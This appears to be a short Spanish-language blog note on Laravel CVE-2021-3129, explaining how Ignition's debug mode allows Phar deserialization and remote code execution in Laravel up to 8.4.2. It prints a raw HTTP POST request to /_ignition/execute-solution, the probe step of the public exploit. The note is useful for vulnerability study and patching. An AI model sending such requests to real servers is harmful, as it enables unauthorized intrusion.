
Laravel RCE CVE-2021-3129
Laravel RCE CVE-2021-3129
Cuando Laravel tiene el modo Debug habilitado, debido al uso inseguro de las funciones file_get_contents() y file_put_contents() por parte del componente Ignition que viene con Laravel, un atacante puede desencadenar la deserialización de Phar mediante la realización de solicitudes maliciosas, la construcción de archivos de Log maliciosos, etc., lo que finalmente resulta en la ejecución remota de código.
Laravel <= 8.4.2
POST /_ignition/execute-solution HTTP/1.1
Host: 192.168.24.153:8888
Accept: application/json
Content-Type: application/x-www-form-urlencoded
Content-Length: 133
solution=Facade\Ignition\Solutions\MakeViewVariableOptionalSolution¶meters[variableName]=cve20213129¶meters[viewFile]=null

[CVE-2021-3129]Laravel Debug mode Reproducción de RCE | tyskillのBlog